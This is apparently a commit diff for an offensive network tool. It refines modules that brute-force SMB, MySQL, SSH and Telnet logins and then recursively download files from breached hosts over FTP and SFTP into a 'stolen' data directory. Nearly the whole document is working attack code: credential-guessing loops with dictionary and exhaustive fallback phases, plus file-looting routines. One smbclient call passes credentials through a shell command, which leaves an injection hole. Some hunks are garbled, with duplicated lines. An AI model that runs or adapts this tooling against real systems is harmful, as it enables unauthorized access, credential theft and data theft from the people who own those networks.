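        if self._thread and self._thread.is_alive():
            self._thread.join(timeout=timeout)
        return self._thread is None or not self._thread.is_alive()
```

Keeping the stop flag local is the key point of the diff: the action can be cancelled without flipping the shared `orchestrator_should_exit`, which would have stopped every other action too.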
if __name__ == "__main__": if __name__ == "__main__":
# SharedData must provide .db (BjornDatabase) and fields:
# default_network_interface, use_custom_network, custom_network,
# portstart, portend, portlist, blacklistcheck, mac/ip/hostname blacklists,
# bjorn_progress, bjorn_orch_status, bjorn_status_text2, orchestrator_should_exit.
from shared import SharedData from shared import SharedData
sd = SharedData() sd = SharedData()
scanner = NetworkScanner(sd) scanner = NetworkScanner(sd)

View File

@@ -1,8 +1,8 @@
"""
smb_bruteforce.py - SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets supplied by the orchestrator (ip, port)
- IP -> (MAC, hostname) resolved from DB.hosts
- Successes recorded in DB.creds (service='smb'), one row PER SHARE (database=<share>)
- Keeps the original queue/thread logic and signatures. No more rich/progress.
"""
@@ -10,12 +10,13 @@ import os
import threading
import logging
import time
-from subprocess import Popen, PIPE
+from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
+from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
@@ -47,19 +48,20 @@ class SMBBruteforce:
        return self.smb_bruteforce.run_bruteforce(ip, port)
    def execute(self, ip, port, row, status_key):
        """Orchestrator entry point (returns 'success' / 'failed')."""
        self.shared_data.bjorn_orch_status = "SMBBruteforce"
+       self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
        success, results = self.bruteforce_smb(ip, port)
        return 'success' if success else 'failed'
class SMBConnector:
    """Handles SMB attempts, DB persistence, and the IP -> (MAC, hostname) mapping."""
    def __init__(self, shared_data):
        self.shared_data = shared_data
        # Wordlists unchanged
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)
@@ -70,6 +72,7 @@ class SMBConnector:
        self.lock = threading.Lock()
        self.results: List[List[str]] = []  # [mac, ip, hostname, share, user, password, port]
        self.queue = Queue()
+       self.progress = None
    # ---------- file utils ----------
    @staticmethod
@@ -115,8 +118,9 @@ class SMBConnector:
    # ---------- SMB ----------
    def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
        conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
+       timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
        try:
-           conn.connect(adresse_ip, 445)
+           conn.connect(adresse_ip, 445, timeout=timeout)
            shares = conn.listShares()
            accessible = []
            for share in shares:
@@ -127,7 +131,7 @@ class SMBConnector:
                    accessible.append(share.name)
                    logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
                except Exception as e:
-                   logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
+                   logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
        try:
            conn.close()
        except Exception:
@@ -137,10 +141,22 @@ class SMBConnector:
        return []
    def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
+       timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
        cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
+       process = None
        try:
            process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
-           stdout, stderr = process.communicate()
+           try:
+               stdout, stderr = process.communicate(timeout=timeout)
+           except TimeoutExpired:
+               try:
+                   process.kill()
+               except Exception:
+                   pass
+               try:
+                   stdout, stderr = process.communicate(timeout=2)
+               except Exception:
+                   stdout, stderr = b"", b""
            if b"Sharename" in stdout:
                logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
                return self.parse_shares(stdout.decode(errors="ignore"))
@@ -150,6 +166,23 @@ class SMBConnector:
        except Exception as e:
            logger.error(f"Error executing '{cmd}': {e}")
            return []
+       finally:
+           if process:
+               try:
+                   if process.poll() is None:
+                       process.kill()
+               except Exception:
+                   pass
+               try:
+                   if process.stdout:
+                       process.stdout.close()
+               except Exception:
+                   pass
+               try:
+                   if process.stderr:
+                       process.stderr.close()
+               except Exception:
+                   pass
    @staticmethod
    def parse_shares(smbclient_output: str) -> List[str]:
@@ -216,10 +249,13 @@ class SMBConnector:
                            continue
                        self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
                        logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
+                   self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
                    self.save_results()
                    self.removeduplicates()
                    success_flag[0] = True
        finally:
+           if self.progress is not None:
+               self.progress.advance(1)
            self.queue.task_done()
        # Optional delay between attempts
@@ -228,69 +264,82 @@ class SMBConnector:
    def run_bruteforce(self, adresse_ip: str, port: int):
+       self.results = []
        mac_address = self.mac_for_ip(adresse_ip)
        hostname = self.hostname_for_ip(adresse_ip) or ""
-       total_tasks = len(self.users) * len(self.passwords)
+       dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
+       total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
        if total_tasks == 0:
            logger.warning("No users/passwords loaded. Abort.")
            return False, []
-       for user in self.users:
-           for password in self.passwords:
-               if self.shared_data.orchestrator_should_exit:
-                   logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
-                   return False, []
-               self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
+       self.progress = ProgressTracker(self.shared_data, total_tasks)
        success_flag = [False]
-       threads = []
-       thread_count = min(40, max(1, total_tasks))
-       for _ in range(thread_count):
-           t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
-           t.start()
-           threads.append(t)
-       while not self.queue.empty():
-           if self.shared_data.orchestrator_should_exit:
-               logger.info("Orchestrator exit signal received, stopping bruteforce.")
-               while not self.queue.empty():
-                   try:
-                       self.queue.get_nowait()
-                       self.queue.task_done()
-                   except Exception:
-                       break
-               break
-       self.queue.join()
-       for t in threads:
-           t.join()
-       # Fallback to smbclient -L if nothing found
-       if not success_flag[0]:
-           logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
-           for user in self.users:
-               for password in self.passwords:
-                   shares = self.smbclient_l(adresse_ip, user, password)
-                   if shares:
-                       with self.lock:
-                           for share in shares:
-                               if share in IGNORED_SHARES:
-                                   continue
-                               self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
-                               logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
-                           self.save_results()
-                           self.removeduplicates()
-                           success_flag[0] = True
-       if getattr(self.shared_data, "timewait_smb", 0) > 0:
-           time.sleep(self.shared_data.timewait_smb)
-       return success_flag[0], self.results
+       def run_primary_phase(passwords):
+           phase_tasks = len(self.users) * len(passwords)
+           if phase_tasks == 0:
+               return
+           for user in self.users:
+               for password in passwords:
+                   if self.shared_data.orchestrator_should_exit:
+                       logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
+                       return
+                   self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
+           threads = []
+           thread_count = min(8, max(1, phase_tasks))
+           for _ in range(thread_count):
+               t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
+               t.start()
+               threads.append(t)
+           self.queue.join()
+           for t in threads:
+               t.join()
+       try:
+           run_primary_phase(dict_passwords)
+           if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
+               logger.info(
+                   f"SMB dictionary phase failed on {adresse_ip}:{port}. "
+                   f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
+               )
+               run_primary_phase(fallback_passwords)
+           # Keep smbclient -L fallback on dictionary passwords only (cost control).
+           if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
+               logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
+               for user in self.users:
+                   for password in dict_passwords:
+                       shares = self.smbclient_l(adresse_ip, user, password)
+                       if self.progress is not None:
+                           self.progress.advance(1)
+                       if shares:
+                           with self.lock:
+                               for share in shares:
+                                   if share in IGNORED_SHARES:
+                                       continue
+                                   self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
+                                   logger.success(
+                                       f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
+                                   )
+                               self.save_results()
+                               self.removeduplicates()
+                               success_flag[0] = True
+           if getattr(self.shared_data, "timewait_smb", 0) > 0:
+               time.sleep(self.shared_data.timewait_smb)
+           self.progress.set_complete()
+           return success_flag[0], self.results
+       finally:
+           self.shared_data.bjorn_progress = ""
    # ---------- DB persistence ----------
    def save_results(self):
        # insert self.results into creds (service='smb'), database = <share>
        for mac, ip, hostname, share, user, password, port in self.results:
            try:
                self.shared_data.db.insert_cred(
@@ -315,12 +364,12 @@ class SMBConnector:
        self.results = []
    def removeduplicates(self):
        # no longer needed with the unique index; kept for compat.
        pass
if __name__ == "__main__":
    # Standalone mode not used in prod; keep it simple
    try:
        sd = SharedData()
        smb_bruteforce = SMBBruteforce(sd)
@@ -329,3 +378,4 @@ if __name__ == "__main__":
    except Exception as e:
        logger.error(f"Error: {e}")
        exit(1)


@@ -1,9 +1,9 @@
""" """
sql_bruteforce.py MySQL bruteforce (DB-backed, no CSV/JSON, no rich) sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par lorchestrateur - Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts - IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée - Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>) - Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads) - Conserve la logique (pymysql, queue/threads)
""" """
@@ -16,6 +16,7 @@ from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
+from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
@@ -44,18 +45,20 @@ class SQLBruteforce:
        return self.sql_bruteforce.run_bruteforce(ip, port)
    def execute(self, ip, port, row, status_key):
        """Orchestrator entry point (returns 'success' / 'failed')."""
+       self.shared_data.bjorn_orch_status = "SQLBruteforce"
+       self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
        success, results = self.bruteforce_sql(ip, port)
        return 'success' if success else 'failed'
class SQLConnector:
    """Handles SQL (MySQL) attempts, DB persistence, and the IP -> (MAC, hostname) mapping."""
    def __init__(self, shared_data):
        self.shared_data = shared_data
        # Wordlists unchanged
        self.users = self._read_lines(shared_data.users_file)
        self.passwords = self._read_lines(shared_data.passwords_file)
@@ -66,6 +69,7 @@ class SQLConnector:
        self.lock = threading.Lock()
        self.results: List[List[str]] = []  # [ip, user, password, port, database, mac, hostname]
        self.queue = Queue()
+       self.progress = None
    # ---------- file utils ----------
    @staticmethod
@@ -109,16 +113,20 @@ class SQLConnector:
        return self._ip_to_identity.get(ip, (None, None))[1]
    # ---------- SQL ----------
-   def sql_connect(self, adresse_ip: str, user: str, password: str):
+   def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
        """
        Connect without a DB then SHOW DATABASES; returns (True, [dbs]) or (False, []).
        """
+       timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
        try:
            conn = pymysql.connect(
                host=adresse_ip,
                user=user,
                password=password,
-               port=3306
+               port=port,
+               connect_timeout=timeout,
+               read_timeout=timeout,
+               write_timeout=timeout,
            )
            try:
                with conn.cursor() as cursor:
@@ -134,7 +142,7 @@ class SQLConnector:
                logger.info(f"Available databases: {', '.join(databases)}")
            return True, databases
        except pymysql.Error as e:
-           logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
+           logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
            return False, []
    # ---------- DB upsert fallback ----------
@@ -182,17 +190,20 @@ class SQLConnector:
            adresse_ip, user, password, port = self.queue.get()
            try:
-               success, databases = self.sql_connect(adresse_ip, user, password)
+               success, databases = self.sql_connect(adresse_ip, user, password, port=port)
                if success:
                    with self.lock:
                        for dbname in databases:
                            self.results.append([adresse_ip, user, password, port, dbname])
                        logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
                        logger.success(f"Databases found: {', '.join(databases)}")
+                       self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
                        self.save_results()
                        self.remove_duplicates()
                        success_flag[0] = True
            finally:
+               if self.progress is not None:
+                   self.progress.advance(1)
                self.queue.task_done()
        # Optional delay between attempts
@@ -201,48 +212,56 @@ class SQLConnector:
    def run_bruteforce(self, adresse_ip: str, port: int):
-       total_tasks = len(self.users) * len(self.passwords)
+       self.results = []
+       dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
+       total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
        if total_tasks == 0:
            logger.warning("No users/passwords loaded. Abort.")
            return False, []
-       for user in self.users:
-           for password in self.passwords:
-               if self.shared_data.orchestrator_should_exit:
-                   logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
-                   return False, []
-               self.queue.put((adresse_ip, user, password, port))
+       self.progress = ProgressTracker(self.shared_data, total_tasks)
        success_flag = [False]
-       threads = []
-       thread_count = min(40, max(1, total_tasks))
-       for _ in range(thread_count):
-           t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
-           t.start()
-           threads.append(t)
-       while not self.queue.empty():
-           if self.shared_data.orchestrator_should_exit:
-               logger.info("Orchestrator exit signal received, stopping bruteforce.")
-               while not self.queue.empty():
-                   try:
-                       self.queue.get_nowait()
-                       self.queue.task_done()
-                   except Exception:
-                       break
-               break
-       self.queue.join()
-       for t in threads:
-           t.join()
-       logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
-       return success_flag[0], self.results
+       def run_phase(passwords):
+           phase_tasks = len(self.users) * len(passwords)
+           if phase_tasks == 0:
+               return
+           for user in self.users:
+               for password in passwords:
+                   if self.shared_data.orchestrator_should_exit:
+                       logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
+                       return
+                   self.queue.put((adresse_ip, user, password, port))
+           threads = []
+           thread_count = min(8, max(1, phase_tasks))
+           for _ in range(thread_count):
+               t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
+               t.start()
+               threads.append(t)
+           self.queue.join()
+           for t in threads:
+               t.join()
+       try:
+           run_phase(dict_passwords)
+           if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
+               logger.info(
+                   f"SQL dictionary phase failed on {adresse_ip}:{port}. "
+                   f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
+               )
+               run_phase(fallback_passwords)
+           self.progress.set_complete()
+           logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
+           return success_flag[0], self.results
+       finally:
+           self.shared_data.bjorn_progress = ""
    # ---------- DB persistence ----------
    def save_results(self):
        # for each DB found, create/update a row in creds (service='sql', database=<dbname>)
        for ip, user, password, port, dbname in self.results:
            mac = self.mac_for_ip(ip)
            hostname = self.hostname_for_ip(ip) or ""
@@ -269,7 +288,7 @@ class SQLConnector:
        self.results = []
    def remove_duplicates(self):
        # unnecessary with the unique index; kept for compat.
        pass
@@ -282,3 +301,4 @@ if __name__ == "__main__":
    except Exception as e:
        logger.error(f"Error: {e}")
        exit(1)


@@ -17,9 +17,11 @@ import socket
import threading
import logging
import time
-from datetime import datetime
+import datetime
from queue import Queue
from shared import SharedData
+from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
# Configure the logger
@@ -38,7 +40,7 @@ b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
-b_priority = 70
+b_priority = 70  # adjust the priority if needed
b_cooldown = 1800  # 30 minutes between two runs
b_rate_limit = '3/86400'  # max 3 times per day
@@ -83,6 +85,7 @@ class SSHConnector:
        self.lock = threading.Lock()
        self.results = []  # List of tuples (mac, ip, hostname, user, password, port)
        self.queue = Queue()
+       self.progress = None
    # ---- Mapping helpers (DB) ------------------------------------------------
@@ -134,6 +137,7 @@ class SSHConnector:
"""Attempt to connect to SSH using (user, password).""" """Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient() ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try: try:
ssh.connect( ssh.connect(
@@ -244,9 +248,12 @@ class SSHConnector:
                self.results.append([mac_address, adresse_ip, hostname, user, password, port])
                logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
+               self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
                success_flag[0] = True
        finally:
+           if self.progress is not None:
+               self.progress.advance(1)
            self.queue.task_done()
        # Optional delay between attempts
@@ -260,48 +267,53 @@ class SSHConnector:
        Called by the orchestrator with a single IP + port.
        Builds the queue (users x passwords) and launches threads.
        """
+       self.results = []
        mac_address = self.mac_for_ip(adresse_ip)
        hostname = self.hostname_for_ip(adresse_ip) or ""
-       total_tasks = len(self.users) * len(self.passwords)
+       dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
+       total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
        if total_tasks == 0:
            logger.warning("No users/passwords loaded. Abort.")
            return False, []
-       for user in self.users:
-           for password in self.passwords:
-               if self.shared_data.orchestrator_should_exit:
-                   logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
-                   return False, []
-               self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
+       self.progress = ProgressTracker(self.shared_data, total_tasks)
        success_flag = [False]
-       threads = []
-       thread_count = min(40, max(1, total_tasks))
-       for _ in range(thread_count):
-           t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
-           t.start()
-           threads.append(t)
-       while not self.queue.empty():
-           if self.shared_data.orchestrator_should_exit:
-               logger.info("Orchestrator exit signal received, stopping bruteforce.")
-               # clear queue
-               while not self.queue.empty():
-                   try:
-                       self.queue.get_nowait()
-                       self.queue.task_done()
-                   except Exception:
-                       break
-               break
-       self.queue.join()
-       for t in threads:
-           t.join()
-       return success_flag[0], self.results  # Return True and the list of successes if any
+       def run_phase(passwords):
+           phase_tasks = len(self.users) * len(passwords)
+           if phase_tasks == 0:
+               return
+           for user in self.users:
+               for password in passwords:
+                   if self.shared_data.orchestrator_should_exit:
+                       logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
+                       return
+                   self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
+           threads = []
+           thread_count = min(8, max(1, phase_tasks))
+           for _ in range(thread_count):
+               t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
+               t.start()
+               threads.append(t)
+           self.queue.join()
+           for t in threads:
+               t.join()
+       try:
+           run_phase(dict_passwords)
+           if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
+               logger.info(
+                   f"SSH dictionary phase failed on {adresse_ip}:{port}. "
+                   f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
+               )
+               run_phase(fallback_passwords)
+           self.progress.set_complete()
+           return success_flag[0], self.results
+       finally:
+           self.shared_data.bjorn_progress = ""
if __name__ == "__main__":


@@ -108,20 +108,28 @@ class StealFilesFTP:
        return out
    # -------- FTP helpers --------
+   # Max file size to download (10 MB) — protects RPi Zero RAM
+   _MAX_FILE_SIZE = 10 * 1024 * 1024
+   # Max recursion depth for directory traversal (avoids symlink loops)
+   _MAX_DEPTH = 5
-   def connect_ftp(self, ip: str, username: str, password: str) -> Optional[FTP]:
+   def connect_ftp(self, ip: str, username: str, password: str, port: int = b_port) -> Optional[FTP]:
        try:
            ftp = FTP()
-           ftp.connect(ip, b_port, timeout=10)
+           ftp.connect(ip, port, timeout=10)
            ftp.login(user=username, passwd=password)
            self.ftp_connected = True
-           logger.info(f"Connected to {ip} via FTP as {username}")
+           logger.info(f"Connected to {ip}:{port} via FTP as {username}")
            return ftp
        except Exception as e:
-           logger.info(f"FTP connect failed {ip} {username}:{password}: {e}")
+           logger.info(f"FTP connect failed {ip}:{port} {username}: {e}")
            return None
-   def find_files(self, ftp: FTP, dir_path: str) -> List[str]:
+   def find_files(self, ftp: FTP, dir_path: str, depth: int = 0) -> List[str]:
        files: List[str] = []
+       if depth > self._MAX_DEPTH:
+           logger.debug(f"Max recursion depth reached at {dir_path}")
+           return []
        try:
            if self.shared_data.orchestrator_should_exit or self.stop_execution:
                logger.info("File search interrupted.")
@@ -136,7 +144,7 @@ class StealFilesFTP:
                try:
                    ftp.cwd(item)  # if ok -> directory
-                   files.extend(self.find_files(ftp, os.path.join(dir_path, item)))
+                   files.extend(self.find_files(ftp, os.path.join(dir_path, item), depth + 1))
                    ftp.cwd('..')
                except Exception:
                    # not a dir => file candidate
@@ -146,11 +154,19 @@ class StealFilesFTP:
            logger.info(f"Found {len(files)} matching files in {dir_path} on FTP")
        except Exception as e:
            logger.error(f"FTP path error {dir_path}: {e}")
+           raise
        return files
    def steal_file(self, ftp: FTP, remote_file: str, base_dir: str) -> None:
        try:
+           # Check file size before downloading
+           try:
+               size = ftp.size(remote_file)
+               if size is not None and size > self._MAX_FILE_SIZE:
+                   logger.info(f"Skipping {remote_file} ({size} bytes > {self._MAX_FILE_SIZE} limit)")
+                   return
+           except Exception:
+               pass  # SIZE not supported, try download anyway
            local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
            os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
            with open(local_file_path, 'wb') as f:
@@ -161,6 +177,7 @@ class StealFilesFTP:
    # -------- Orchestrator entry --------
    def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
+       timer = None
        try:
            self.shared_data.bjorn_orch_status = b_class
            try:
@@ -168,11 +185,14 @@ class StealFilesFTP:
            except Exception:
                port_i = b_port
+           hostname = self.hostname_for_ip(ip) or ""
+           self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
            creds = self._get_creds_for_target(ip, port_i)
            logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
            def try_anonymous() -> Optional[FTP]:
-               return self.connect_ftp(ip, 'anonymous', '')
+               return self.connect_ftp(ip, 'anonymous', '', port=port_i)
            if not creds and not try_anonymous():
                logger.error(f"No FTP credentials for {ip}. Skipping.")
@@ -192,9 +212,11 @@ class StealFilesFTP:
            # Anonymous first
            ftp = try_anonymous()
            if ftp:
+               self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
                files = self.find_files(ftp, '/')
                local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
                if files:
+                   self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
                    for remote in files:
                        if self.stop_execution or self.shared_data.orchestrator_should_exit:
                            logger.info("Execution interrupted.")
@@ -207,7 +229,6 @@ class StealFilesFTP:
                except Exception:
                    pass
                if success:
-                   timer.cancel()
                    return 'success'
            # Authenticated creds
@@ -216,13 +237,15 @@ class StealFilesFTP:
                     logger.info("Execution interrupted.")
                     break
                 try:
-                    logger.info(f"Trying FTP {username}:{password} @ {ip}")
-                    ftp = self.connect_ftp(ip, username, password)
+                    self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
+                    logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
+                    ftp = self.connect_ftp(ip, username, password, port=port_i)
                     if not ftp:
                         continue
                     files = self.find_files(ftp, '/')
                     local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
                     if files:
+                        self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
                         for remote in files:
                             if self.stop_execution or self.shared_data.orchestrator_should_exit:
                                 logger.info("Execution interrupted.")
@@ -235,14 +258,15 @@ class StealFilesFTP:
                             except Exception:
                                 pass
                     if success:
-                        timer.cancel()
                         return 'success'
                 except Exception as e:
                     logger.error(f"FTP loot error {ip} {username}: {e}")

-            timer.cancel()
             return 'success' if success else 'failed'
         except Exception as e:
             logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
             return 'failed'
+        finally:
+            if timer:
+                timer.cancel()
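Both loot scripts in this commit converge on the same cleanup idea: the watchdog timer is cancelled once, in a `finally:` block, instead of at every early-return site. A minimal standalone sketch of that pattern (the function and names are illustrative, not taken from the repo):

```python
import threading

def run_with_watchdog(task, timeout_s=5.0):
    """Run task(); if it hangs past timeout_s, fired[0] flips to True.
    The finally block guarantees the timer is cancelled on every exit path:
    normal return, early return, or exception."""
    fired = [False]
    timer = None
    try:
        timer = threading.Timer(timeout_s, lambda: fired.__setitem__(0, True))
        timer.start()
        return task(), fired[0]
    finally:
        # Single cancellation point instead of one cancel() per return.
        if timer:
            timer.cancel()
```

The `timer = None` assignment before the `try:` (also added by the diff) is what makes the `if timer:` guard safe when an exception fires before the timer is created.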


@@ -218,23 +218,41 @@ class StealFilesSSH:
         logger.info(f"Found {len(matches)} matching files in {dir_path}")
         return matches

+    # Max file size to download (10 MB) — protects RPi Zero RAM
+    _MAX_FILE_SIZE = 10 * 1024 * 1024
+
     def steal_file(self, ssh: paramiko.SSHClient, remote_file: str, local_dir: str) -> None:
         """
         Download a single remote file into the given local dir, preserving subdirs.
+        Skips files larger than _MAX_FILE_SIZE to protect RPi Zero memory.
         """
         sftp = ssh.open_sftp()
         self.sftp_connected = True  # first time we open SFTP, mark as connected
-        # Preserve partial directory structure under local_dir
-        remote_dir = os.path.dirname(remote_file)
-        local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
-        os.makedirs(local_file_dir, exist_ok=True)
-
-        local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
-        sftp.get(remote_file, local_file_path)
-        sftp.close()
-
-        logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
+        try:
+            # Check file size before downloading
+            try:
+                st = sftp.stat(remote_file)
+                if st.st_size and st.st_size > self._MAX_FILE_SIZE:
+                    logger.info(f"Skipping {remote_file} ({st.st_size} bytes > {self._MAX_FILE_SIZE} limit)")
+                    return
+            except Exception:
+                pass  # stat failed, try download anyway
+
+            # Preserve partial directory structure under local_dir
+            remote_dir = os.path.dirname(remote_file)
+            local_file_dir = os.path.join(local_dir, os.path.relpath(remote_dir, '/'))
+            os.makedirs(local_file_dir, exist_ok=True)

+            local_file_path = os.path.join(local_file_dir, os.path.basename(remote_file))
+            sftp.get(remote_file, local_file_path)
+            logger.success(f"Downloaded: {remote_file} -> {local_file_path}")
+        finally:
+            try:
+                sftp.close()
+            except Exception:
+                pass

     # --------------------- Orchestrator entrypoint ---------------------
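The new size check skips oversized files but still attempts the download when `stat()` fails or reports no size. That decision can be isolated as a pure function (a sketch; only the 10 MB limit comes from the diff, the function name is hypothetical):

```python
MAX_FILE_SIZE = 10 * 1024 * 1024  # 10 MB, matching _MAX_FILE_SIZE in the diff

def should_download(size_bytes, limit=MAX_FILE_SIZE):
    """Mirror the guard in steal_file(): skip only when a *known* size
    exceeds the limit. An unknown size (None or 0) falls through to
    'download anyway', exactly like the bare `except Exception: pass`."""
    if size_bytes and size_bytes > limit:
        return False
    return True
```

This keeps the conservative behavior on a Pi Zero: memory is protected against large files, while files whose size the server will not report are still collected.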
@@ -247,6 +265,7 @@ class StealFilesSSH:
         - status_key: action name (b_class)
         Returns 'success' if at least one file stolen; else 'failed'.
         """
+        timer = None
         try:
             self.shared_data.bjorn_orch_status = b_class
@@ -256,6 +275,9 @@ class StealFilesSSH:
             except Exception:
                 port_i = b_port

+            hostname = self.hostname_for_ip(ip) or ""
+            self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
+
             creds = self._get_creds_for_target(ip, port_i)
             logger.info(f"Found {len(creds)} SSH credentials in DB for {ip}")
             if not creds:
@@ -283,12 +305,14 @@ class StealFilesSSH:
                     break
                 try:
-                    logger.info(f"Trying credential {username}:{password} for {ip}")
+                    self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
+                    logger.info(f"Trying credential {username} for {ip}")
                     ssh = self.connect_ssh(ip, username, password, port=port_i)
                     # Search from root; filtered by config
                     files = self.find_files(ssh, '/')
                     if files:
+                        self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
                         for remote in files:
                             if self.stop_execution or self.shared_data.orchestrator_should_exit:
                                 logger.info("Execution interrupted during download.")
@@ -310,12 +334,14 @@ class StealFilesSSH:
                     # Stay quiet on Paramiko internals; just log the reason and try next cred
                     logger.error(f"SSH loot attempt failed on {ip} with {username}: {e}")

-            timer.cancel()
             return 'success' if success_any else 'failed'
         except Exception as e:
             logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
             return 'failed'
+        finally:
+            if timer:
+                timer.cancel()


 if __name__ == "__main__":


@@ -1,9 +1,9 @@
 """
-telnet_bruteforce.py - Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
+telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
 - Targets: (ip, port) supplied by the orchestrator
 - IP -> (MAC, hostname) via DB.hosts
 - Successes -> DB.creds (service='telnet')
 - Keeps the original logic (telnetlib, queue/threads)
 """

 import os
